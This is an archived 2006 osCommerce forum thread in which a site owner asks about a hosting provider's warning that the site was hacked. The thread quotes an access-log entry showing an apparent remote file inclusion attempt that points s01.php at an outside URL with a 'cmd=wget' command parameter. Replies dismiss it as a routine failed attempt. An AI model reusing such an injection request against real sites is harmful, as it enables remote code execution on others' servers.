jasper98 Posted September 21, 2006 Posted September 21, 2006 Dear xxxx It has come to our attention that your web space has been hacked: access.log.xxxx - - [18/Aug/2006:04:54:57 -0400] "GET http://xxx.xxx.xxx.xxx/s01.php?shopid=http...com/shop/CMD.gi f?&cmd=wget HTTP/1.0" 200 2297 xxx.xxx.xxx.xxx "http://xxx.xxx.xxx.xxx/s01.php?shopid=http://flaming-moe.com/shop/CMD.g if?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-" -- The above was taken from your access logs. It shows that /s01.php was used to perpetrate the hack. Please contact the developers for this script/application. You will likely need to install a version update and/or security patch to prevent further abuse. Also, reply to this email in acknowledgement of this issue. Failure to do so can result in your account being locked and possibly terminated. I received this email from 1and1 admin and am a bit confused. I have no s01.php on the server. Has anyone seen this before, I don't know how to resolve this with 1and1. I did a search for this attack and didn't find anything related to oscommerce, just powergap. Any help appreciated.
boxtel Posted September 21, 2006 Posted September 21, 2006 I received this email from 1and1 admin and am a bit confused. I have no s01.php on the server. Has anyone seen this before, I don't know how to resolve this with 1and1. I did a search for this attack and didn't find anything related to oscommerce, just powergap. Any help appreciated. I would request immediate termination and go elsewhere. Treasurer MFC
jasper98 Posted September 21, 2006 Author Posted September 21, 2006 Could you elaborate a bit? I understand that many people dislike 1and1, but I've had no issues with them until this.
boxtel Posted September 21, 2006 Posted September 21, 2006 Could you elaborate a bit? I understand that many people dislike 1and1, but I've had no issues with them until this. I don't dislike 1and1 but when I see this kind of nonsense I can understand why some people might. Treasurer MFC
jasper98 Posted September 21, 2006 Author Posted September 21, 2006 I don't dislike 1and1 but when I see this kind of nonsense I can understand why some people might. ah, i see, so there is nothing to this then I'm guessing? I mean I can't find anything wrong with the site. Is this just a stupid email I should disregard? Notice at the bottom of their email it says to contact them about the issue. How should I respond?
boxtel Posted September 21, 2006 Posted September 21, 2006 ah, i see, so there is nothing to this then I'm guessing? I mean I can't find anything wrong with the site. Is this just a stupid email I should disregard? Notice at the bottom of their email it says to contact them about the issue. How should I respond? well, first I would ask them where they obtained the nerve to access your access logs as I would consider those company confidential information. Then I would ask them to explain where they obtained the deduction that this is a successful hack. It's an attempt maybe but those futile hack attempts I get daily. Treasurer MFC
jasper98 Posted September 21, 2006 Author Posted September 21, 2006 well, first I would ask them where they obtained the nerve to access your access logs as I would consider those company confidential information. Then I would ask them to explain where they obtained the deduction that this is a successful hack. It's an attempt maybe but those futile hack attempts I get daily. was my first reaction, thanks.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.